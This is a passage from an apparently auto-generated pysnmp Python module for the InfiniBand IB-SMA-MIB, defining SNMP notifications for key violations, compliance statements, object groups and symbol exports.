ibSmaBadManagementKey = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 7)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeMethod"), ("IB-SMA-MIB", "ibSmaNodeAttributeId"), ("IB-SMA-MIB", "ibSmaNodeAttributeModifier"))
if mibBuilder.loadTexts: ibSmaBadManagementKey.setStatus('current')
ibSmaBadPartitionKey = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 8)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"))
if mibBuilder.loadTexts: ibSmaBadPartitionKey.setStatus('current')
ibSmaBadQueueKey = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 9)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"))
if mibBuilder.loadTexts: ibSmaBadQueueKey.setStatus('current')
ibSmaBadPKeyAtSwitchPort = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 10)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"), ("IB-SMA-MIB", "ibSmaNodeSwitchLid"), ("IB-SMA-MIB", "ibSmaNodeDataValid"))
if mibBuilder.loadTexts: ibSmaBadPKeyAtSwitchPort.setStatus('current')
ibSmaCompliances = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 3, 1))
ibSmaGroups = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 3, 2))
ibSmaBasicNodeCompliance = ModuleCompliance((1, 3, 6, 1, 3, 117, 3, 3, 1, 1)).setObjects(("IB-SMA-MIB", "ibSmaNodeGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaBasicNodeCompliance = ibSmaBasicNodeCompliance.setStatus('current')
ibSmaFullSwitchCompliance = ModuleCompliance((1, 3, 6, 1, 3, 117, 3, 3, 1, 2)).setObjects(("IB-SMA-MIB", "ibSmaNodeGroup"), ("IB-SMA-MIB", "ibSmaSwitchGroup"), ("IB-SMA-MIB", "ibSmaGuidGroup"), ("IB-SMA-MIB", "ibSmaMgmtPortGroup"), ("IB-SMA-MIB", "ibSmaDataPortGroup"), ("IB-SMA-MIB", "ibSmaPKeyGroup"), ("IB-SMA-MIB", "ibSmaSlToVlMapGroup"), ("IB-SMA-MIB", "ibSmaVLArbitGroup"), ("IB-SMA-MIB", "ibSmaLFTGroup"), ("IB-SMA-MIB", "ibSmaRFTGroup"), ("IB-SMA-MIB", "ibSmaMFTGroup"), ("IB-SMA-MIB", "ibSmaSMGroup"), ("IB-SMA-MIB", "ibSmaVendDiagGroup"), ("IB-SMA-MIB", "ibSmaLedGroup"), ("IB-SMA-MIB", "ibSmaNotificationsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaFullSwitchCompliance = ibSmaFullSwitchCompliance.setStatus('current')
ibSmaFullRouterCACompliance = ModuleCompliance((1, 3, 6, 1, 3, 117, 3, 3, 1, 3)).setObjects(("IB-SMA-MIB", "ibSmaNodeGroup"), ("IB-SMA-MIB", "ibSmaGuidGroup"), ("IB-SMA-MIB", "ibSmaMgmtPortGroup"), ("IB-SMA-MIB", "ibSmaDataPortGroup"), ("IB-SMA-MIB", "ibSmaPKeyGroup"), ("IB-SMA-MIB", "ibSmaSlToVlMapGroup"), ("IB-SMA-MIB", "ibSmaVLArbitGroup"), ("IB-SMA-MIB", "ibSmaSMGroup"), ("IB-SMA-MIB", "ibSmaVendDiagGroup"), ("IB-SMA-MIB", "ibSmaLedGroup"), ("IB-SMA-MIB", "ibSmaNotificationsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaFullRouterCACompliance = ibSmaFullRouterCACompliance.setStatus('current')
ibSmaNodeGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 1)).setObjects(("IB-SMA-MIB", "ibSmaNodeString"), ("IB-SMA-MIB", "ibSmaNodeBaseVersion"), ("IB-SMA-MIB", "ibSmaNodeClassVersion"), ("IB-SMA-MIB", "ibSmaNodeType"), ("IB-SMA-MIB", "ibSmaNodeNumPorts"), ("IB-SMA-MIB", "ibSmaSystemImageGuid"), ("IB-SMA-MIB", "ibSmaNodeGuid"), ("IB-SMA-MIB", "ibSmaNodePortGuid"), ("IB-SMA-MIB", "ibSmaNodePartitionTableNum"), ("IB-SMA-MIB", "ibSmaNodeDeviceId"), ("IB-SMA-MIB", "ibSmaNodeRevision"), ("IB-SMA-MIB", "ibSmaNodeLocalPortNumOrZero"), ("IB-SMA-MIB", "ibSmaNodeVendorId"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"), ("IB-SMA-MIB", "ibSmaNodeMethod"), ("IB-SMA-MIB", "ibSmaNodeAttributeId"), ("IB-SMA-MIB", "ibSmaNodeAttributeModifier"), ("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeCapMask"), ("IB-SMA-MIB", "ibSmaNodeSwitchLid"), ("IB-SMA-MIB", "ibSmaNodeDataValid"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaNodeGroup = ibSmaNodeGroup.setStatus('current')
ibSmaSwitchGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 2)).setObjects(("IB-SMA-MIB", "ibSmaSwLinearFdbTableNum"), ("IB-SMA-MIB", "ibSmaSwRandomFdbTableNum"), ("IB-SMA-MIB", "ibSmaSwMulticastFdbTableNum"), ("IB-SMA-MIB", "ibSmaSwLinearFdbTop"), ("IB-SMA-MIB", "ibSmaSwDefaultPort"), ("IB-SMA-MIB", "ibSmaSwDefMcastPriPort"), ("IB-SMA-MIB", "ibSmaSwDefMcastNotPriPort"), ("IB-SMA-MIB", "ibSmaSwLifeTimeValue"), ("IB-SMA-MIB", "ibSmaSwPortStateChange"), ("IB-SMA-MIB", "ibSmaSwLidsPerPort"), ("IB-SMA-MIB", "ibSmaSwPartitionEnforceNum"), ("IB-SMA-MIB", "ibSmaSwInboundEnforceCap"), ("IB-SMA-MIB", "ibSmaSwOutboundEnforceCap"), ("IB-SMA-MIB", "ibSmaSwFilterRawPktInputCap"), ("IB-SMA-MIB", "ibSmaSwFilterRawPktOutputCap"), ("IB-SMA-MIB", "ibSmaSwEnhancedPort0"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaSwitchGroup = ibSmaSwitchGroup.setStatus('current')
ibSmaGuidGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 3)).setObjects(("IB-SMA-MIB", "ibSmaGuidVal"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaGuidGroup = ibSmaGuidGroup.setStatus('current')
ibSmaMgmtPortGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 4)).setObjects(("IB-SMA-MIB", "ibSmaPortMKey"), ("IB-SMA-MIB", "ibSmaPortGidPrefix"), ("IB-SMA-MIB", "ibSmaPortLid"), ("IB-SMA-MIB", "ibSmaPortMasterSmLid"), ("IB-SMA-MIB", "ibSmaPortIsSubnetManager"), ("IB-SMA-MIB", "ibSmaPortIsNoticeSupported"), ("IB-SMA-MIB", "ibSmaPortIsTrapSupported"), ("IB-SMA-MIB", "ibSmaPortIsAutoMigrateSupported"), ("IB-SMA-MIB", "ibSmaPortIsSlMappingSupported"), ("IB-SMA-MIB", "ibSmaPortIsMKeyNvram"), ("IB-SMA-MIB", "ibSmaPortIsPKeyNvram"), ("IB-SMA-MIB", "ibSmaPortIsLedInfoSupported"), ("IB-SMA-MIB", "ibSmaPortIsSmDisabled"), ("IB-SMA-MIB", "ibSmaPortIsSysImgGuidSupported"), ("IB-SMA-MIB", "ibSmaPortIsPKeyExtPortTrapSup"), ("IB-SMA-MIB", "ibSmaPortIsCommManageSupported"), ("IB-SMA-MIB", "ibSmaPortIsSnmpTunnelSupported"), ("IB-SMA-MIB", "ibSmaPortIsReinitSupported"), ("IB-SMA-MIB", "ibSmaPortIsDevManageSupported"), ("IB-SMA-MIB", "ibSmaPortIsVendorClassSupported"), ("IB-SMA-MIB", "ibSmaPortIsDrNoticeSupported"), ("IB-SMA-MIB", "ibSmaPortIsCapMaskNoticSupported"), ("IB-SMA-MIB", "ibSmaPortIsBootMgmtSupported"), ("IB-SMA-MIB", "ibSmaPortMKeyLeasePeriod"), ("IB-SMA-MIB", "ibSmaPortMKeyProtectBits"), ("IB-SMA-MIB", "ibSmaPortMasterSmSl"), ("IB-SMA-MIB", "ibSmaPortInitTypeLoad"), ("IB-SMA-MIB", "ibSmaPortInitTypeContent"), ("IB-SMA-MIB", "ibSmaPortInitTypePresence"), ("IB-SMA-MIB", "ibSmaPortInitTypeResuscitate"), ("IB-SMA-MIB", "ibSmaPortInitNoLoadReply"), ("IB-SMA-MIB", "ibSmaPortInitPreserveContReply"), ("IB-SMA-MIB", "ibSmaPortInitPreservePresReply"), ("IB-SMA-MIB", "ibSmaPortMKeyViolations"), ("IB-SMA-MIB", "ibSmaPortPKeyViolations"), ("IB-SMA-MIB", "ibSmaPortQKeyViolations"), ("IB-SMA-MIB", "ibSmaPortNumGuid"), ("IB-SMA-MIB", "ibSmaPortSubnetTimeout"), ("IB-SMA-MIB", "ibSmaPortResponseTimeValue"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaMgmtPortGroup = ibSmaMgmtPortGroup.setStatus('current')
ibSmaDataPortGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 5)).setObjects(("IB-SMA-MIB", "ibSmaPortLinkWidthEnabled"), ("IB-SMA-MIB", "ibSmaPortLinkWidthSupported"), ("IB-SMA-MIB", "ibSmaPortLinkWidthActive"), ("IB-SMA-MIB", "ibSmaPortLinkSpeedSupported"), ("IB-SMA-MIB", "ibSmaPortLinkState"), ("IB-SMA-MIB", "ibSmaPortPhysState"), ("IB-SMA-MIB", "ibSmaPortLinkDownDefaultState"), ("IB-SMA-MIB", "ibSmaPortLidMaskCount"), ("IB-SMA-MIB", "ibSmaPortLinkSpeedActive"), ("IB-SMA-MIB", "ibSmaPortLinkSpeedEnabled"), ("IB-SMA-MIB", "ibSmaPortNeighborMtu"), ("IB-SMA-MIB", "ibSmaPortVirtLaneSupport"), ("IB-SMA-MIB", "ibSmaPortVlHighPriorityLimit"), ("IB-SMA-MIB", "ibSmaPortVlArbHighCapacity"), ("IB-SMA-MIB", "ibSmaPortVlArbLowCapacity"), ("IB-SMA-MIB", "ibSmaPortMtuCapacity"), ("IB-SMA-MIB", "ibSmaPortVlStallCount"), ("IB-SMA-MIB", "ibSmaPortHeadOfQueueLife"), ("IB-SMA-MIB", "ibSmaPortOperationalVls"), ("IB-SMA-MIB", "ibSmaPortPartEnforceInbound"), ("IB-SMA-MIB", "ibSmaPortPartEnforceOutbound"), ("IB-SMA-MIB", "ibSmaPortFilterRawPktInbound"), ("IB-SMA-MIB", "ibSmaPortFilterRawPktOutbound"), ("IB-SMA-MIB", "ibSmaPortLocalPhysErrorThreshold"), ("IB-SMA-MIB", "ibSmaPortOverrunErrorThreshold"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaDataPortGroup = ibSmaDataPortGroup.setStatus('current')
ibSmaPKeyGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 6)).setObjects(("IB-SMA-MIB", "ibSmaPKeyMembership"), ("IB-SMA-MIB", "ibSmaPKeyBase"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaPKeyGroup = ibSmaPKeyGroup.setStatus('current')
ibSmaSlToVlMapGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 7)).setObjects(("IB-SMA-MIB", "ibSmaVirtualLane"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaSlToVlMapGroup = ibSmaSlToVlMapGroup.setStatus('current')
ibSmaVLArbitGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 8)).setObjects(("IB-SMA-MIB", "ibSmaHiPriVirtLane"), ("IB-SMA-MIB", "ibSmaHiPriWeight"), ("IB-SMA-MIB", "ibSmaLowPriVirtLane"), ("IB-SMA-MIB", "ibSmaLowPriWeight"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaVLArbitGroup = ibSmaVLArbitGroup.setStatus('current')
ibSmaLFTGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 9)).setObjects(("IB-SMA-MIB", "ibSmaLinForwEgressPort"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaLFTGroup = ibSmaLFTGroup.setStatus('current')
ibSmaRFTGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 10)).setObjects(("IB-SMA-MIB", "ibSmaRandomDestLID"), ("IB-SMA-MIB", "ibSmaRandomForwEgressPort"), ("IB-SMA-MIB", "ibSmaRandomLMC"), ("IB-SMA-MIB", "ibSmaRandomIsValid"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaRFTGroup = ibSmaRFTGroup.setStatus('current')
ibSmaMFTGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 11)).setObjects(("IB-SMA-MIB", "ibSmaMulForwMask"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaMFTGroup = ibSmaMFTGroup.setStatus('current')
ibSmaSMGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 12)).setObjects(("IB-SMA-MIB", "ibSmaSmGuid"), ("IB-SMA-MIB", "ibSmaSmSmKey"), ("IB-SMA-MIB", "ibSmaSmSmpCount"), ("IB-SMA-MIB", "ibSmaSmPriority"), ("IB-SMA-MIB", "ibSmaSmState"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaSMGroup = ibSmaSMGroup.setStatus('current')
ibSmaVendDiagGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 13)).setObjects(("IB-SMA-MIB", "ibSmaPortGenericDiagCode"), ("IB-SMA-MIB", "ibSmaPortVendorDiagCode"), ("IB-SMA-MIB", "ibSmaPortVendorDiagIndexFwd"), ("IB-SMA-MIB", "ibSmaPortVendorDiagData"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaVendDiagGroup = ibSmaVendDiagGroup.setStatus('current')
ibSmaLedGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 14)).setObjects(("IB-SMA-MIB", "ibSmaLedState"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaLedGroup = ibSmaLedGroup.setStatus('current')
ibSmaNotificationsGroup = NotificationGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 15)).setObjects(("IB-SMA-MIB", "ibSmaPortLinkStateChange"), ("IB-SMA-MIB", "ibSmaLinkIntegrityThresReached"), ("IB-SMA-MIB", "ibSmaExcessBuffOverrunThres"), ("IB-SMA-MIB", "ibSmaFlowCntrlUpdateTimerExpire"), ("IB-SMA-MIB", "ibSmaCapabilityMaskModified"), ("IB-SMA-MIB", "ibSmaSysImageGuidModified"), ("IB-SMA-MIB", "ibSmaBadManagementKey"), ("IB-SMA-MIB", "ibSmaBadPartitionKey"), ("IB-SMA-MIB", "ibSmaBadQueueKey"), ("IB-SMA-MIB", "ibSmaBadPKeyAtSwitchPort"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ibSmaNotificationsGroup = ibSmaNotificationsGroup.setStatus('current')
mibBuilder.exportSymbols("IB-SMA-MIB", ibSmaNodeBaseVersion=ibSmaNodeBaseVersion, ibSmaRandomForwardingTable=ibSmaRandomForwardingTable, ibSmaNotificationPrefix=ibSmaNotificationPrefix, ibSmaNodeRevision=ibSmaNodeRevision, ibSmaSmInfoEntry=ibSmaSmInfoEntry, ibSmaVendDiagInfoEntry=ibSmaVendDiagInfoEntry, ibSmaMgmtPortGroup=ibSmaMgmtPortGroup, ibSmaNodeType=ibSmaNodeType, ibSmaNodeGid1=ibSmaNodeGid1, ibSmaPKeyIBAPortIndex=ibSmaPKeyIBAPortIndex, ibSmaMIB=ibSmaMIB, ibSmaBadManagementKey=ibSmaBadManagementKey, ibSmaFullSwitchCompliance=ibSmaFullSwitchCompliance, ibSmaPKeyIndex=ibSmaPKeyIndex, ibSmaPortInitTypeContent=ibSmaPortInitTypeContent, ibSmaLinDestDLIDIndex=ibSmaLinDestDLIDIndex, ibSmaPortIndex=ibSmaPortIndex, ibSmaPKeyTable=ibSmaPKeyTable, ibSmaVendDiagInfoTable=ibSmaVendDiagInfoTable, ibSmaHiPriVirtLane=ibSmaHiPriVirtLane, ibSmaVLArbitGroup=ibSmaVLArbitGroup, ibSmaNodeNumPorts=ibSmaNodeNumPorts, ibSmaPortInitPreserveContReply=ibSmaPortInitPreserveContReply, ibSmaSubMgrInfo=ibSmaSubMgrInfo, ibSmaLFTInfo=ibSmaLFTInfo, ibSmaSwPartitionEnforceNum=ibSmaSwPartitionEnforceNum, ibSmaRandomForwardingPortIndex=ibSmaRandomForwardingPortIndex, ibSmaSMInfo=ibSmaSMInfo, ibSmaPortOperationalVls=ibSmaPortOperationalVls, ibSmaPortInitNoLoadReply=ibSmaPortInitNoLoadReply, ibSmaBadQueueKey=ibSmaBadQueueKey, ibSmaRFTInfo=ibSmaRFTInfo, ibSmaPortNumGuid=ibSmaPortNumGuid, ibSmaHiPriVlArbEntry=ibSmaHiPriVlArbEntry, ibSmaPortMKeyProtectBits=ibSmaPortMKeyProtectBits, ibSmaLowPriWeight=ibSmaLowPriWeight, ibSmaServiceLevelIndex=ibSmaServiceLevelIndex, ibSmaPortGenericDiagCode=ibSmaPortGenericDiagCode, ibSmaGroups=ibSmaGroups, ibSmaNodeAttributeId=ibSmaNodeAttributeId, ibSmaNodeQueuePair2=ibSmaNodeQueuePair2, ibSmaPortLinkSpeedActive=ibSmaPortLinkSpeedActive, ibSmaVendDiagGroup=ibSmaVendDiagGroup, ibSmaSwLinearFdbTop=ibSmaSwLinearFdbTop, ibSmaPortMasterSmSl=ibSmaPortMasterSmSl, ibSmaLinForwEgressPort=ibSmaLinForwEgressPort, ibSmaPortLinkDownDefaultState=ibSmaPortLinkDownDefaultState, 
ibSmaLedIndex=ibSmaLedIndex, ibSmaSwitchGroup=ibSmaSwitchGroup, ibSmaPortPhysState=ibSmaPortPhysState, ibSmaPortLinkState=ibSmaPortLinkState, ibSmaSwFilterRawPktInputCap=ibSmaSwFilterRawPktInputCap, ibSmaPortVlArbHighCapacity=ibSmaPortVlArbHighCapacity, ibSmaGuidIndex=ibSmaGuidIndex, ibSmaPortVlStallCount=ibSmaPortVlStallCount, ibSmaPortMKeyViolations=ibSmaPortMKeyViolations, ibSmaPortInfoEntry=ibSmaPortInfoEntry, ibSmaVendDiagInfo=ibSmaVendDiagInfo, ibSmaLedState=ibSmaLedState, ibSmaNodeDataValid=ibSmaNodeDataValid, ibSmaRandomIsValid=ibSmaRandomIsValid, ibSmaNodeLid=ibSmaNodeLid, ibSmaGuidGroup=ibSmaGuidGroup, ibSmaPortMtuCapacity=ibSmaPortMtuCapacity, ibSmaSysImageGuidModified=ibSmaSysImageGuidModified, ibSmaIBAOutPortIndex=ibSmaIBAOutPortIndex, ibSmaLowPriIBAPortIndex=ibSmaLowPriIBAPortIndex, ibSmaPortInitTypePresence=ibSmaPortInitTypePresence, ibSmaNodePartitionTableNum=ibSmaNodePartitionTableNum, ibSmaCompliances=ibSmaCompliances, ibSmaPortIsLedInfoSupported=ibSmaPortIsLedInfoSupported, ibSmaPortIsReinitSupported=ibSmaPortIsReinitSupported, ibSmaGuidInfoEntry=ibSmaGuidInfoEntry, PYSNMP_MODULE_ID=ibSmaMIB, ibSmaNodeKey=ibSmaNodeKey, ibSmaPortIsSysImgGuidSupported=ibSmaPortIsSysImgGuidSupported, ibSmaPortResponseTimeValue=ibSmaPortResponseTimeValue, ibSmaHiPriWeight=ibSmaHiPriWeight, ibSmaNodePortGuid=ibSmaNodePortGuid, ibSmaFullRouterCACompliance=ibSmaFullRouterCACompliance, ibSmaNodeGuid=ibSmaNodeGuid, ibSmaPortQKeyViolations=ibSmaPortQKeyViolations, ibSmaHiPriIBAPortIndex=ibSmaHiPriIBAPortIndex, ibSmaLowPriVlArbEntry=ibSmaLowPriVlArbEntry, ibSmaNotificationsGroup=ibSmaNotificationsGroup, ibSmaSmInfoTable=ibSmaSmInfoTable, ibSmaSwLifeTimeValue=ibSmaSwLifeTimeValue, ibSmaMulForwMask=ibSmaMulForwMask, ibSmaPKeyBase=ibSmaPKeyBase, ibSmaPortLocalPhysErrorThreshold=ibSmaPortLocalPhysErrorThreshold, ibSmaPortNeighborMtu=ibSmaPortNeighborMtu, ibSmaRandomForwardingEntry=ibSmaRandomForwardingEntry, ibSmaNodeInfo=ibSmaNodeInfo, 
ibSmaPortInitTypeResuscitate=ibSmaPortInitTypeResuscitate, ibSmaRandomForwEgressPort=ibSmaRandomForwEgressPort, ibSmaPortIsSlMappingSupported=ibSmaPortIsSlMappingSupported, ibSmaMulForEntry=ibSmaMulForEntry, ibSmaSlToVlMapGroup=ibSmaSlToVlMapGroup, ibSmaSwDefMcastPriPort=ibSmaSwDefMcastPriPort, ibSmaPortMasterSmLid=ibSmaPortMasterSmLid, ibSmaHiPriVlArbTable=ibSmaHiPriVlArbTable, ibSmaSwInboundEnforceCap=ibSmaSwInboundEnforceCap, ibSmaPortVlHighPriorityLimit=ibSmaPortVlHighPriorityLimit, ibSmaPortIsSubnetManager=ibSmaPortIsSubnetManager, ibSmaPortIsDrNoticeSupported=ibSmaPortIsDrNoticeSupported, ibSmaPortFilterRawPktInbound=ibSmaPortFilterRawPktInbound, ibSmaPortMKeyLeasePeriod=ibSmaPortMKeyLeasePeriod, ibSmaSystemImageGuid=ibSmaSystemImageGuid, ibSmaPortGidPrefix=ibSmaPortGidPrefix, ibSmaPortLid=ibSmaPortLid, ibSmaPortLidMaskCount=ibSmaPortLidMaskCount, ibSmaSmSmKey=ibSmaSmSmKey, ibSmaSMGroup=ibSmaSMGroup, ibSmaPortMKey=ibSmaPortMKey, ibSmaLedInfoTable=ibSmaLedInfoTable, ibSmaPortVendorDiagCode=ibSmaPortVendorDiagCode, ibSmaIBAInPortIndex=ibSmaIBAInPortIndex, ibSmaVendDiagPortIndex=ibSmaVendDiagPortIndex, ibSmaPortVendorDiagData=ibSmaPortVendorDiagData, ibSmaSwDefaultPort=ibSmaSwDefaultPort, ibSmaFlowCntrlUpdateTimerExpire=ibSmaFlowCntrlUpdateTimerExpire, ibSmaPortLinkSpeedEnabled=ibSmaPortLinkSpeedEnabled, ibSmaNodeVendorId=ibSmaNodeVendorId, ibSmaSwPortStateChange=ibSmaSwPortStateChange, ibSmaLowPriVlArbTable=ibSmaLowPriVlArbTable, ibSmaPortIsSmDisabled=ibSmaPortIsSmDisabled, ibSmaPortIsBootMgmtSupported=ibSmaPortIsBootMgmtSupported, ibSmaPKeyMembership=ibSmaPKeyMembership, ibSmaRandomDestLID=ibSmaRandomDestLID, ibSmaSmSmpCount=ibSmaSmSmpCount, ibSmaPortVendorDiagIndexFwd=ibSmaPortVendorDiagIndexFwd, ibSmaLinForEntry=ibSmaLinForEntry, ibSmaSwFilterRawPktOutputCap=ibSmaSwFilterRawPktOutputCap, ibSmaSmInfoPortIndex=ibSmaSmInfoPortIndex, ibSmaPortIsPKeyExtPortTrapSup=ibSmaPortIsPKeyExtPortTrapSup, ibSmaLFTGroup=ibSmaLFTGroup, 
ibSmaPortFilterRawPktOutbound=ibSmaPortFilterRawPktOutbound, ibSmaPortIsVendorClassSupported=ibSmaPortIsVendorClassSupported, ibSmaPortIsDevManageSupported=ibSmaPortIsDevManageSupported, ibSmaPortLinkWidthEnabled=ibSmaPortLinkWidthEnabled, ibSmaPortLinkWidthSupported=ibSmaPortLinkWidthSupported, ibSmaLinkIntegrityThresReached=ibSmaLinkIntegrityThresReached, ibSmaNodeClassVersion=ibSmaNodeClassVersion, ibSmaDataPortInfo=ibSmaDataPortInfo, ibSmaNodeLocalPortNumOrZero=ibSmaNodeLocalPortNumOrZero, ibSmaPortInitTypeLoad=ibSmaPortInitTypeLoad, ibSmaPKeyInfo=ibSmaPKeyInfo, ibSmaGuidVal=ibSmaGuidVal, ibSmaLinForTable=ibSmaLinForTable, ibSmaMgmtPortInfo=ibSmaMgmtPortInfo, ibSmaSwMulticastFdbTableNum=ibSmaSwMulticastFdbTableNum, ibSmaNodeDeviceId=ibSmaNodeDeviceId, ibSmaMFTGroup=ibSmaMFTGroup, ibSmaSwEnhancedPort0=ibSmaSwEnhancedPort0, ibSmaHiPriNIndex=ibSmaHiPriNIndex, ibSmaSwLidsPerPort=ibSmaSwLidsPerPort, ibSmaLedGroup=ibSmaLedGroup, ibSmaNodeGroup=ibSmaNodeGroup, ibSmaPortSubnetTimeout=ibSmaPortSubnetTimeout, ibSmaSL2VLMapEntry=ibSmaSL2VLMapEntry, ibSmaSlToVlMapInfo=ibSmaSlToVlMapInfo, ibSmaPortInitPreservePresReply=ibSmaPortInitPreservePresReply, ibSmaBasicNodeCompliance=ibSmaBasicNodeCompliance, ibSmaMulDestDLIDIndex=ibSmaMulDestDLIDIndex, ibSmaMFTInfo=ibSmaMFTInfo, ibSmaBadPartitionKey=ibSmaBadPartitionKey, ibSmaCapabilityMaskModified=ibSmaCapabilityMaskModified, ibSmaNodeString=ibSmaNodeString, ibSmaSmGuid=ibSmaSmGuid, ibSmaPortLinkStateChange=ibSmaPortLinkStateChange, ibSmaLowPriNIndex=ibSmaLowPriNIndex, ibSmaPortPKeyViolations=ibSmaPortPKeyViolations, ibSmaSmPriority=ibSmaSmPriority, ibSmaVirtualLane=ibSmaVirtualLane, ibSmaConformance=ibSmaConformance, ibSmaNodeGid2=ibSmaNodeGid2, ibSmaLedInfoEntry=ibSmaLedInfoEntry, ibSmaPortIsSnmpTunnelSupported=ibSmaPortIsSnmpTunnelSupported, ibSmaGuidInfo=ibSmaGuidInfo, ibSmaPKeyEntry=ibSmaPKeyEntry, ibSmaSwRandomFdbTableNum=ibSmaSwRandomFdbTableNum, ibSmaLowPriVirtLane=ibSmaLowPriVirtLane, 
ibSmaPortHeadOfQueueLife=ibSmaPortHeadOfQueueLife, ibSmaPortLinkWidthActive=ibSmaPortLinkWidthActive, ibSmaRFTGroup=ibSmaRFTGroup, ibSmaSwitchInfo=ibSmaSwitchInfo, ibSmaNodeAttributeModifier=ibSmaNodeAttributeModifier, ibSmaSL2VLMapTable=ibSmaSL2VLMapTable, ibSmaPortLinkSpeedSupported=ibSmaPortLinkSpeedSupported, ibSmaObjects=ibSmaObjects, ibSmaDataPortGroup=ibSmaDataPortGroup, ibSmaPortIsCommManageSupported=ibSmaPortIsCommManageSupported, ibSmaVLArbitInfo=ibSmaVLArbitInfo, ibSmaNodeLid2=ibSmaNodeLid2, ibSmaPortIsPKeyNvram=ibSmaPortIsPKeyNvram, ibSmaPortOverrunErrorThreshold=ibSmaPortOverrunErrorThreshold, ibSmaBadPKeyAtSwitchPort=ibSmaBadPKeyAtSwitchPort, ibSmaNotifications=ibSmaNotifications, ibSmaPortIsCapMaskNoticSupported=ibSmaPortIsCapMaskNoticSupported, ibSmaSwDefMcastNotPriPort=ibSmaSwDefMcastNotPriPort, ibSmaGuidInfoTable=ibSmaGuidInfoTable, ibSmaSwOutboundEnforceCap=ibSmaSwOutboundEnforceCap, ibSmaNodeQueuePair1=ibSmaNodeQueuePair1, ibSmaSwLinearFdbTableNum=ibSmaSwLinearFdbTableNum, ibSmaPortPartEnforceOutbound=ibSmaPortPartEnforceOutbound, ibSmaPortIsMKeyNvram=ibSmaPortIsMKeyNvram, ibSmaPortIsNoticeSupported=ibSmaPortIsNoticeSupported, ibSmaMulForTable=ibSmaMulForTable, ibSmaGuidPortIndex=ibSmaGuidPortIndex, 